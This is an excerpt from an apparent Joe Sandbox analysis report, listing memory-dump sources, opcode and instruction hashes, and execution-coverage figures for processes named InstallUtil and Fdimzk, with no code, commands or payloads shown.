                                        • Instruction ID: ef0df7b51f73845d982e13a204aae9e7029b9609e492fc4fefd849aa86c509a1
                                        • Opcode Fuzzy Hash: a2a8912f0d181688f989eccc0add2c7a0c96bc033b07c1a242431b9d6ba4a382
                                        • Instruction Fuzzy Hash: A5317235E106099BCB15DF64D894AAEBBF2FF89300F148929E806EB750DB70BD41CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c83c8903241312da1c7aa6f68d554eb64b478bcca965248507efa921270059a3
                                        • Instruction ID: a091e438521bc9638ab32a1c8d5ea54ada9fd6ccbca07dee8b8a2b630c6ae551
                                        • Opcode Fuzzy Hash: c83c8903241312da1c7aa6f68d554eb64b478bcca965248507efa921270059a3
                                        • Instruction Fuzzy Hash: 2A219075F002199FDB10DFA9D880AAEBBF5FB88B10F108469EA45E7350E731D9408B94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ed18f64445e00b80de4331cb3837ef83c5b7f333adb3d1ccc76a0670fe0ae6a
                                        • Instruction ID: 947cd54cb04b8c92a9bf2fcbd4e594ea7b6c41d0a204a840a45aec5993def25e
                                        • Opcode Fuzzy Hash: 1ed18f64445e00b80de4331cb3837ef83c5b7f333adb3d1ccc76a0670fe0ae6a
                                        • Instruction Fuzzy Hash: 00216075F102199FDB00DF69D980AAEBBF6FF88B10F144465E945E7350E730D9408B94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015485355.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_84d000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13c8b2aea999ecfbf1c85213f4cd4fb183d2336e42cf34e7c122bb66df48c888
                                        • Instruction ID: 1ed5c1b40e06a9f9855409e1462f07754a4f4ef0c0cd326d176c1ed15c36cf15
                                        • Opcode Fuzzy Hash: 13c8b2aea999ecfbf1c85213f4cd4fb183d2336e42cf34e7c122bb66df48c888
                                        • Instruction Fuzzy Hash: 652137B2604308DFDB05DF10D9C4B26BF66FB94324F20C569E9098B346C336E856CBA2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015557381.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_85d000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28bde8ced52a2119130a30777f4996c7a2c1f7a8441207dd41a1ca6d3add8a42
                                        • Instruction ID: a2e8febcaa77631b6e0da2a8a19266834becef232bf428422faaf95194584ff3
                                        • Opcode Fuzzy Hash: 28bde8ced52a2119130a30777f4996c7a2c1f7a8441207dd41a1ca6d3add8a42
                                        • Instruction Fuzzy Hash: BF212575604704DFDB20DF10D980B26BBA1FB84315F20C56DDC098B382C33AD84BCA62
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b0eb95b7d1a949f24e453b49bbdba2ae7633de6251044b37a5d73ffc22f18bf
                                        • Instruction ID: b02892c0b0541453caae5433b9f4bf9785de74c21d2075d94d226ea1c7a26423
                                        • Opcode Fuzzy Hash: 6b0eb95b7d1a949f24e453b49bbdba2ae7633de6251044b37a5d73ffc22f18bf
                                        • Instruction Fuzzy Hash: EF219331B001199BDF14DBA9E890AAEBBB7EB84310F148829E406D7754DB31DD818B90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e12d7983cc6ed65e77601c8730aed661346ba549baa83b2b0f283a0f46d08a95
                                        • Instruction ID: 478272cefae160e407190006f0617538cc6e5534d035d9e5d1e2ed579a181905
                                        • Opcode Fuzzy Hash: e12d7983cc6ed65e77601c8730aed661346ba549baa83b2b0f283a0f46d08a95
                                        • Instruction Fuzzy Hash: B6217230B0011D9BDF14DAA9E890AAEB7F7EF84310F148825E809D7754DB31ED818B94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015557381.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_85d000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 560808207d61d46f4a542cc4424e83b494baa1abd495e12909d2c14c0a55031b
                                        • Instruction ID: 56f7d1ff068d93ac458af9ba05f70620353d6e2beff447d0c5df8b3e9bb6ef09
                                        • Opcode Fuzzy Hash: 560808207d61d46f4a542cc4424e83b494baa1abd495e12909d2c14c0a55031b
                                        • Instruction Fuzzy Hash: D6215A7550D7C08FCB13DB24C990715BF71AB46214F28C5EADC898B6A3C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f2e1a58e1bc17a646a2a4cd2a0f6be8f77f82c66c134dc9d88edd69adcba876
                                        • Instruction ID: 7aca7b99639a4ccc6744ce12269116653f67752f5bf5b39e2e6a85fcc0047320
                                        • Opcode Fuzzy Hash: 5f2e1a58e1bc17a646a2a4cd2a0f6be8f77f82c66c134dc9d88edd69adcba876
                                        • Instruction Fuzzy Hash: 33118471E002199BCB24DB65D8816DEF7B6FF89710F148DA9E406E7640DB319A44CBD1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35a5f448aa586f5bf485c19c0f4f14a164fd0929dd75edffb70f5d1f1a19d747
                                        • Instruction ID: f1ad3573e5dee6e62c77eb817ca5edc41a8280c0fad7f65f5c43f3682fe96ecb
                                        • Opcode Fuzzy Hash: 35a5f448aa586f5bf485c19c0f4f14a164fd0929dd75edffb70f5d1f1a19d747
                                        • Instruction Fuzzy Hash: 40118E31B040298BCB049A69C810ABF77EBEBC8B11F148939D50AE7340EF25DD029BA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0614eb3136c80388e91cafaaf52da6edf80cb3b3664265b31fd96cfc1d1526f1
                                        • Instruction ID: e4088d17bf92aeef416985c2731da4c0bb16311c5a760e53c8f8bea034cbe789
                                        • Opcode Fuzzy Hash: 0614eb3136c80388e91cafaaf52da6edf80cb3b3664265b31fd96cfc1d1526f1
                                        • Instruction Fuzzy Hash: 8E112B32B0421C8BDF249965DD886AA7377FB80351F050C6ADE06E7640D630EB05C790
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015485355.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_84d000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                        • Instruction ID: cc4c5689c044e71f766ab59f7a0fcb4331df5fafe766ec6e1f8c56a0ccf6025d
                                        • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                        • Instruction Fuzzy Hash: 5F11D076504384DFCB06DF10D9C4B16BF72FB94324F24C6A9D8494B656C33AE85ACBA2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 533a856fd15e89af0ae6a1e73874636f8031e77b1d16d5e542080d8aa5fdd700
                                        • Instruction ID: cbea5984dd78b9070d7c95b7e49735903fc482b7cf51901add1e8a5262e2f311
                                        • Opcode Fuzzy Hash: 533a856fd15e89af0ae6a1e73874636f8031e77b1d16d5e542080d8aa5fdd700
                                        • Instruction Fuzzy Hash: DC01AD35B002144BDB24A56D9491F2BA7EBEBC9F21F248C7AF00ACB741DE75ED4243A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ef2f313a126ec723122a2c0227d50ade7c2d1e2aa839c6a627957f3e2633af7
                                        • Instruction ID: 641073e43a2fdbf65628283ae8f16d8c9fd4c458da66b8b698226fc16d40b774
                                        • Opcode Fuzzy Hash: 2ef2f313a126ec723122a2c0227d50ade7c2d1e2aa839c6a627957f3e2633af7
                                        • Instruction Fuzzy Hash: B521D0B5D01259AFCB00DF9AD984ADEFBB4FB48710F10852AE918B7740D374A954CFA4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10caadb9afd9cb533a8f08df6d6c032f6bbd6e77d6b59bc9082862256ebc04fe
                                        • Instruction ID: 578bbf00cdb76074358dc8f3413e5b9e2b7d3662c548bf100cc1c7a4521d4108
                                        • Opcode Fuzzy Hash: 10caadb9afd9cb533a8f08df6d6c032f6bbd6e77d6b59bc9082862256ebc04fe
                                        • Instruction Fuzzy Hash: 2011D0B1D01259AFCB00DF9AD885ADEFBF8FB48710F10852AE918A7340C375A954CFA5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87418b294c0b63aea4e6cb68e4371e6b46eee989c4fac93f0b263a6e315eef98
                                        • Instruction ID: f85bb6d79de5db049e857a035ef7a18d02ddfb9ccf41e8d3875fa2324fb1d4e6
                                        • Opcode Fuzzy Hash: 87418b294c0b63aea4e6cb68e4371e6b46eee989c4fac93f0b263a6e315eef98
                                        • Instruction Fuzzy Hash: 3101F2327005184BEB21957C9890F3E23DBEBC8720F144C6AF00ACB780EE24EC024351
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c4b97125ff9a5b52a3ed866f0e941a7988be0b39de3162369e5fa2bec8b364e
                                        • Instruction ID: 0ed5ca862a88c0f80069433e500e70af864c5dad03e8eb223073fd98bfae53ea
                                        • Opcode Fuzzy Hash: 0c4b97125ff9a5b52a3ed866f0e941a7988be0b39de3162369e5fa2bec8b364e
                                        • Instruction Fuzzy Hash: 2301D1357001144BDB24A56D9491F2BA6EBEBC9F20F208C7AF00ACB741DE61ED4243E1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99e5780df7ae8c7e78a200d31a284b4f7a94956e20012ea85d4a0aa43f5ccad0
                                        • Instruction ID: f230e50cd0120face398e1d79553b5ba4556c25a4fb16e1d57140c03d895bbd5
                                        • Opcode Fuzzy Hash: 99e5780df7ae8c7e78a200d31a284b4f7a94956e20012ea85d4a0aa43f5ccad0
                                        • Instruction Fuzzy Hash: 9901DF32B040194BDB449A6CCC106BB7AABEBC8B10F18493ADA0AE7740EF24C90257E1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d6ce17f74ef74765b4fe7eb4fa33bec2ac3657f9965938d8dd7f9edd7101fdb
                                        • Instruction ID: 3f58ea5c5beffc211f7a7f4011f9135ef7d24a76cf2c3fcd419ca0ed73f04829
                                        • Opcode Fuzzy Hash: 8d6ce17f74ef74765b4fe7eb4fa33bec2ac3657f9965938d8dd7f9edd7101fdb
                                        • Instruction Fuzzy Hash: 7A01A2717001180BDB24A67CE899F2EB7EAFB89710F144839E50ACB745EE12ED018791
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e09523a8fbed7b09902b98ee8649fd88d8eb212b97ce53b63cdcad2e95c0b1b0
                                        • Instruction ID: 4ea449aaf2b7ac6e11ababf46216ca41a1a1b0cc05a7c743a030bbfec31c72bb
                                        • Opcode Fuzzy Hash: e09523a8fbed7b09902b98ee8649fd88d8eb212b97ce53b63cdcad2e95c0b1b0
                                        • Instruction Fuzzy Hash: 1A018C327005194BEB24A67C9894F3F66EBEBC9B20F148C69F50ACB740EE65ED024395
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3230750ce7341532ef8c245460b8c19c2aed30be8e8ab8877e5ed95cec2bb492
                                        • Instruction ID: 6336cf380446a099c45860090f8c2f64c9b3e1e5d6c8df678b47449a7d915e98
                                        • Opcode Fuzzy Hash: 3230750ce7341532ef8c245460b8c19c2aed30be8e8ab8877e5ed95cec2bb492
                                        • Instruction Fuzzy Hash: 620181307001180BDB24A66CE894F2F77DAFB89710F109839E50ACB744EE22ED014791
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06badb349468fcd52ffde88d7439655dbd6995c4f345e6f403c2edc1a8747095
                                        • Instruction ID: 369dc657d626ce82c09d243224ca632b50ab4fd6507edb4f8428ff24cbb0ec66
                                        • Opcode Fuzzy Hash: 06badb349468fcd52ffde88d7439655dbd6995c4f345e6f403c2edc1a8747095
                                        • Instruction Fuzzy Hash: FAF08276E212289BDF149965E841BEA733AF748325F104825E902E7644E7319D01CBC0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f05ca32d82c5ed3760dbb7b6bc6a9f9e5a9512009fac7eb3915f4c63e5be04ae
                                        • Instruction ID: 53679e6830d523689eed89c06ebe958038859281352d328308bbc8546db78d8f
                                        • Opcode Fuzzy Hash: f05ca32d82c5ed3760dbb7b6bc6a9f9e5a9512009fac7eb3915f4c63e5be04ae
                                        • Instruction Fuzzy Hash: 0EF0FE34E20119DFDF18DF94E899BADBBB6FF44715F200519E002A7694CBB41D41CB81
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31ed562fb363685c6b299cbf2860fe8203786d4bb60a88531cc22d6b9483e3e0
                                        • Instruction ID: 639f27b1031636464a7b9b687bb955f685dfe26adcd09cf31ebcf63c28a2310f
                                        • Opcode Fuzzy Hash: 31ed562fb363685c6b299cbf2860fe8203786d4bb60a88531cc22d6b9483e3e0
                                        • Instruction Fuzzy Hash: 18E08671E0010D6BDF10CE71C945B6A72AEE701314F204CA4D408C7600E272DA415780

                                        Execution Graph

                                        Execution Coverage:14.3%
                                        Dynamic/Decrypted Code Coverage:98.3%
                                        Signature Coverage:0%
                                        Total number of Nodes:402
                                        Total number of Limit Nodes:21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: a705f53fb600b4aaa8ca366698398a92663ac2f98e8dfc4847b5167a221e1d09
                                        • Instruction ID: 99368b8265a3c0623918ce7ed12ae90317e835a5d40e107cb65ae779111d1ce1
                                        • Opcode Fuzzy Hash: a705f53fb600b4aaa8ca366698398a92663ac2f98e8dfc4847b5167a221e1d09
                                        • Instruction Fuzzy Hash: ACB20874A00218DFEB54DFA8C894BADB7B6FB88700F158599EA05EB3A5DB709C41CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 010c6cf059ad1495e1b8c640b64a5a2678409342da186d604e1aea140e8ed41a
                                        • Instruction ID: c9c98ef4c0765016d7929b563c35b0dcf92c4ed248765b864edb6a68f067e77a
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc0883ba94afeff61b0b567486f1f869eb97c8e27f6c8c579e250dcf1e7c15d3
                                        • Instruction ID: 41d8869ccd9bb53bf4277607296ceb7056a047c56769a94e16197106e36fac05
                                        • Opcode Fuzzy Hash: fc0883ba94afeff61b0b567486f1f869eb97c8e27f6c8c579e250dcf1e7c15d3
                                        • Instruction Fuzzy Hash: 2D11C3B4901229CFDBA4EF18C985BE9B7F2FB48304F4480E9E959A3344DB345E808F51
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35be23f829879567d1e10086f0859b412bad1e7a8ef3e4b981ecefca2dce1b6e
                                        • Instruction ID: f1960875daf078e7357b8b4a3063267c8de195e832dc61e687d56ace802dd66f
                                        • Opcode Fuzzy Hash: 35be23f829879567d1e10086f0859b412bad1e7a8ef3e4b981ecefca2dce1b6e
                                        • Instruction Fuzzy Hash: FA111C74901228CFDB54EF24D845BDDB7B2FB88300F1081A9E90AA7398DB345E85CF41
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2050422823.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6b60000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8197197e0206b477d7bf4c0960474ddd9af66fb0a6f460e19e84abb9ec70aae
                                        • Instruction ID: 3d3ca77fb7ef5f33ba5664dba5620b7c09e183274a27d4658893183856e7e8ae
                                        • Opcode Fuzzy Hash: f8197197e0206b477d7bf4c0960474ddd9af66fb0a6f460e19e84abb9ec70aae
                                        • Instruction Fuzzy Hash: 1D11C374A01169CFDB64DF25CA95AEDB7B1BB49304F0040EAE94DA3281DBB45EC49F11
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2050422823.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6b60000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d0762dcace04521276ed27ad73ebb729c450009a6d7aeef91e2f675cb1d6b87
                                        • Instruction ID: 19195091b6c021092afeca33c8f519ce480a309e4f4ab42850936d9f3cace5bf
                                        • Opcode Fuzzy Hash: 2d0762dcace04521276ed27ad73ebb729c450009a6d7aeef91e2f675cb1d6b87
                                        • Instruction Fuzzy Hash: AA1109B4801129CFDBA8EF15C945BA9B7F6FB48304F4090E9E95DA3640DB340EC09F91
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2011611872.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_94d000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3fe03ac0d15fe387af5707958e51a7ce7fb8094a14e454ce77b5cc7b741cce1
                                        • Instruction ID: c634e28ed4c441c5dcae495b95fb55d5dbf9d41e3f23bf20d0444ca4867d5f0b
                                        • Opcode Fuzzy Hash: d3fe03ac0d15fe387af5707958e51a7ce7fb8094a14e454ce77b5cc7b741cce1
                                        • Instruction Fuzzy Hash: 70F0CD76409348AEE7108A06DC84F62FFDCEB41734F18C05AED084A282C378AC40CAB1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2050422823.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6b60000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9e438f0232ead25f11e76799c482845875954c93273f947334a9f1bd4158f07
                                        • Instruction ID: ed1985c02dcf1767494d022e7fed0995d9930daee37c6c60f9291f6d58e2c72f
                                        • Opcode Fuzzy Hash: b9e438f0232ead25f11e76799c482845875954c93273f947334a9f1bd4158f07
                                        • Instruction Fuzzy Hash: F6111B7490022ACFCB68DF14CD84BD9B3B6FB88305F1040E9E61AA7385D3349E818F10
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e083c4d91b5dacfa00d02e2a52dcd7f08b8dde481e1a725499a2bd7e1de47dc
                                        • Instruction ID: 913f5b24e6120950663e4a111e32c62cfaca1e7487e006564215bafa1ec7c94a
                                        • Opcode Fuzzy Hash: 1e083c4d91b5dacfa00d02e2a52dcd7f08b8dde481e1a725499a2bd7e1de47dc
                                        • Instruction Fuzzy Hash: 14F05E74D05388AFCB80DBA8E9656EDBBB5EB46200F10819AD858D3341D7355A42CFA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a6e504f61b9cdb3b85517e4c8d91dd51fe6e18b5312fd776508b50de161ea2c
                                        • Instruction ID: 6d99b4fd77cee4e043aabd4cdc62080652573a4136896a751a125e343779bc86
                                        • Opcode Fuzzy Hash: 4a6e504f61b9cdb3b85517e4c8d91dd51fe6e18b5312fd776508b50de161ea2c
                                        • Instruction Fuzzy Hash: 7EF0A075805348AFC740EF6899407DDBFB9AB09104F14409ADD08C3352D7305B46DBA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35b104fe8fc53f5f9ba0af3dbb3f40e79f98713b310f91bb58687a7a3d2866f9
                                        • Instruction ID: 4c36360054dc13da4e7f753b7f225bffb9063b634fd5f939812951ef4d8f4fdb
                                        • Opcode Fuzzy Hash: 35b104fe8fc53f5f9ba0af3dbb3f40e79f98713b310f91bb58687a7a3d2866f9
                                        • Instruction Fuzzy Hash: 3AF0B830C0A348EFCB91CFA4980069EBFB5AB06200F0481AAEC1492311D7345A80CF90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89c64076b7320e36ca572bffa675ef0f6be074ba987dfe093e0907d09bde04bc
                                        • Instruction ID: dae09feb93cdd21548d9c520198befb276224a5200c8363c60e3ef660316c879
                                        • Opcode Fuzzy Hash: 89c64076b7320e36ca572bffa675ef0f6be074ba987dfe093e0907d09bde04bc
                                        • Instruction Fuzzy Hash: 78014B74E05328CFEBA0CF18DA487D9BBB2BB49305F0040E9D949A2251D7B41E80CF41
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 927d3eb621f718c01dce66cad600cad62e06a81a0e8e609d4c6622df061c17c4
                                        • Instruction ID: 14b7b8b1203c68060392c6e68b0b0f17c295d6f8c0c5f5f272e3e353ff7cf33e
                                        • Opcode Fuzzy Hash: 927d3eb621f718c01dce66cad600cad62e06a81a0e8e609d4c6622df061c17c4
                                        • Instruction Fuzzy Hash: 32F09434D08348AFD741CBA8C8502ADBBB0AB4A204F14C1DAD84893242D3369A02CB90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
